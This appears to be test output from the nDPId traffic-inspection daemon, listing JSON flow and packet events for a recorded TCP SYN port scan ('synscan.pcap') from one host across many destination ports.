-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":132,"source":"synscan.pcap","alias":"nDPId-test","flow_id":126,"flow_packet_id":1,"flow_last_seen":1278275058096,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058096,"pkt":"ACYLMQczACWzv5HuCABFAAAsqFwAAC8GcRasEAAIQA2GNIzSDAXdUoMYAAAAAGACEAAcigAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":133,"source":"synscan.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058096,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1187,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":133,"source":"synscan.pcap","alias":"nDPId-test","flow_id":127,"flow_packet_id":1,"flow_last_seen":1278275058096,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058096,"pkt":"ACYLMQczACWzv5HuCABFAAAsOg0AACsG42WsEAAIQA2GNIzSBKPdUoMYAAAAAGACEAAj7AAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":134,"source":"synscan.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058096,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7200,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":134,"source":"synscan.pcap","alias":"nDPId-test","flow_id":128,"flow_packet_id":1,"flow_last_seen":1278275058096,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058096,"pkt":"ACYLMQczACWzv5HuCABFAAAsF+kAACgGCIqsEAAIQA2GNIzSHCDdUoMYAAAAAGACBAAYbwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":135,"source":"synscan.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058096,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5822,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":135,"source":"synscan.pcap","alias":"nDPId-test","flow_id":129,"flow_packet_id":1,"flow_last_seen":1278275058096,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058096,"pkt":"ACYLMQczACWzv5HuCABFAAAsKVIAADUG6iCsEAAIQA2GNIzSFr7dUoMYAAAAAGACCAAZ0QAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":136,"source":"synscan.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058096,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1024,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":136,"source":"synscan.pcap","alias":"nDPId-test","flow_id":130,"flow_packet_id":1,"flow_last_seen":1278275058096,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058096,"pkt":"ACYLMQczACWzv5HuCABFAAAs8NYAACcGMJysEAAIQA2GNIzSBADdUoMYAAAAAGACEAAkjwAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":137,"source":"synscan.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058096,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10626,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":137,"source":"synscan.pcap","alias":"nDPId-test","flow_id":131,"flow_packet_id":1,"flow_last_seen":1278275058096,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058096,"pkt":"ACYLMQczACWzv5HuCABFAAAsP0EAACcG4jGsEAAIQA2GNIzSKYLdUoMYAAAAAGACEAD\/DAAAAgQFtA=="} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":138,"source":"synscan.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058096,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":138,"source":"synscan.pcap","alias":"nDPId-test","flow_id":132,"flow_packet_id":1,"flow_last_seen":1278275058096,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058096,"pkt":"ACYLMQczACWzv5HuCABFAAAsRFwAADMG0RasEAAIQA2GNIzSACDdUoMYAAAAAGACEAAobwAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":139,"source":"synscan.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058096,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":15004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":139,"source":"synscan.pcap","alias":"nDPId-test","flow_id":133,"flow_packet_id":1,"flow_last_seen":1278275058096,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058096,"pkt":"ACYLMQczACWzv5HuCABFAAAsWBgAADIGvlqsEAAIQA2GNIzSOpzdUoMYAAAAAGACDADx8gAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":140,"source":"synscan.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058096,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":52848,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":140,"source":"synscan.pcap","alias":"nDPId-test","flow_id":134,"flow_packet_id":1,"flow_last_seen":1278275058096,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058096,"pkt":"ACYLMQczACWzv5HuCABFAAAscJoAADMGpNisEAAIQA2GNIzSznDdUoMYAAAAAGACEABaHgAAAgQFtA=="} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":141,"source":"synscan.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058096,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":24,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":141,"source":"synscan.pcap","alias":"nDPId-test","flow_id":135,"flow_packet_id":1,"flow_last_seen":1278275058096,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058096,"pkt":"ACYLMQczACWzv5HuCABFAAAs10IAADEGQDCsEAAIQA2GNIzSABjdUoMYAAAAAGACCAAwdwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":142,"source":"synscan.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058096,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5101,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":142,"source":"synscan.pcap","alias":"nDPId-test","flow_id":136,"flow_packet_id":1,"flow_last_seen":1278275058096,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058096,"pkt":"ACYLMQczACWzv5HuCABFAAAs6Q8AADcGKGOsEAAIQA2GNIzSE+3dUoMYAAAAAGACEAAUogAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":143,"source":"synscan.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058096,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1296,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":143,"source":"synscan.pcap","alias":"nDPId-test","flow_id":137,"flow_packet_id":1,"flow_last_seen":1278275058096,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058096,"pkt":"ACYLMQczACWzv5HuCABFAAAsa+QAADkGo46sEAAIQA2GNIzSBRDdUoMYAAAAAGACCAArfwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":144,"source":"synscan.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058096,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9102,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":144,"source":"synscan.pcap","alias":"nDPId-test","flow_id":138,"flow_packet_id":1,"flow_last_seen":1278275058096,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058096,"pkt":"ACYLMQczACWzv5HuCABFAAAsqBkAAC8GcVmsEAAIQA2GNIzSI47dUoMYAAAAAGACEAAFAQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":145,"source":"synscan.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058155,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9917,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":145,"source":"synscan.pcap","alias":"nDPId-test","flow_id":139,"flow_packet_id":1,"flow_last_seen":1278275058155,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058155,"pkt":"ACYLMQczACWzv5HuCABFAAAsqHIAACwGdACsEAAIQA2GNIzTJr3dU4MZAAAAAGACBAANzwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":146,"source":"synscan.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058155,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1311,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":146,"source":"synscan.pcap","alias":"nDPId-test","flow_id":140,"flow_packet_id":1,"flow_last_seen":1278275058155,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058155,"pkt":"ACYLMQczACWzv5HuCABFAAAstK4AADUGXsSsEAAIQA2GNIzTBR\/dU4MZAAAAAGACCAArbQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":147,"source":"synscan.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058155,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1247,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":147,"source":"synscan.pcap","alias":"nDPId-test","flow_id":141,"flow_packet_id":1,"flow_last_seen":1278275058155,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058155,"pkt":"ACYLMQczACWzv5HuCABFAAAsP4IAACcG4fCsEAAIQA2GNIzTBN\/dU4MZAAAAAGACEAAjrQAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":148,"source":"synscan.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058155,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":14442,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":148,"source":"synscan.pcap","alias":"nDPId-test","flow_id":142,"flow_packet_id":1,"flow_last_seen":1278275058155,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058155,"pkt":"ACYLMQczACWzv5HuCABFAAAstAIAAC8GZXCsEAAIQA2GNIzTOGrdU4MZAAAAAGACEADwIQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":149,"source":"synscan.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058155,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7676,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":149,"source":"synscan.pcap","alias":"nDPId-test","flow_id":143,"flow_packet_id":1,"flow_last_seen":1278275058155,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058155,"pkt":"ACYLMQczACWzv5HuCABFAAAsyLAAADoGRcKsEAAIQA2GNIzTHfzdU4MZAAAAAGACDAAOkAAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":150,"source":"synscan.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058155,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":33899,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":150,"source":"synscan.pcap","alias":"nDPId-test","flow_id":144,"flow_packet_id":1,"flow_last_seen":1278275058155,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058155,"pkt":"ACYLMQczACWzv5HuCABFAAAsFmcAAC4GBAysEAAIQA2GNIzThGvdU4MZAAAAAGACDACoIAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":151,"source":"synscan.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058155,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":151,"source":"synscan.pcap","alias":"nDPId-test","flow_id":145,"flow_packet_id":1,"flow_last_seen":1278275058155,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058155,"pkt":"ACYLMQczACWzv5HuCABFAAAsv88AADcGUaOsEAAIQA2GNIzTD6PdU4MZAAAAAGACEAAY6QAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":152,"source":"synscan.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058155,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1067,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":152,"source":"synscan.pcap","alias":"nDPId-test","flow_id":146,"flow_packet_id":1,"flow_last_seen":1278275058155,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058155,"pkt":"ACYLMQczACWzv5HuCABFAAAsFdcAACkGCZysEAAIQA2GNIzTBCvdU4MZAAAAAGACCAAsYQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":153,"source":"synscan.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058155,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5903,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":153,"source":"synscan.pcap","alias":"nDPId-test","flow_id":147,"flow_packet_id":1,"flow_last_seen":1278275058155,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058155,"pkt":"ACYLMQczACWzv5HuCABFAAAspR4AACUGflSsEAAIQA2GNIzTFw\/dU4MZAAAAAGACCAAZfQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":154,"source":"synscan.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058155,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9200,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":154,"source":"synscan.pcap","alias":"nDPId-test","flow_id":148,"flow_packet_id":1,"flow_last_seen":1278275058155,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058155,"pkt":"ACYLMQczACWzv5HuCABFAAAsZasAADQGrsesEAAIQA2GNIzTI\/DdU4MZAAAAAGACBAAQnAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":155,"source":"synscan.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058155,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2005,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":155,"source":"synscan.pcap","alias":"nDPId-test","flow_id":149,"flow_packet_id":1,"flow_last_seen":1278275058155,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058155,"pkt":"ACYLMQczACWzv5HuCABFAAAsAYwAADEGFeesEAAIQA2GNIzTB9XdU4MZAAAAAGACCAAotwAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":156,"source":"synscan.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058155,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":843,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":156,"source":"synscan.pcap","alias":"nDPId-test","flow_id":150,"flow_packet_id":1,"flow_last_seen":1278275058155,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058155,"pkt":"ACYLMQczACWzv5HuCABFAAAsECUAACcGEU6sEAAIQA2GNIzTA0vdU4MZAAAAAGACEAAlQQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":157,"source":"synscan.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058155,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2701,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 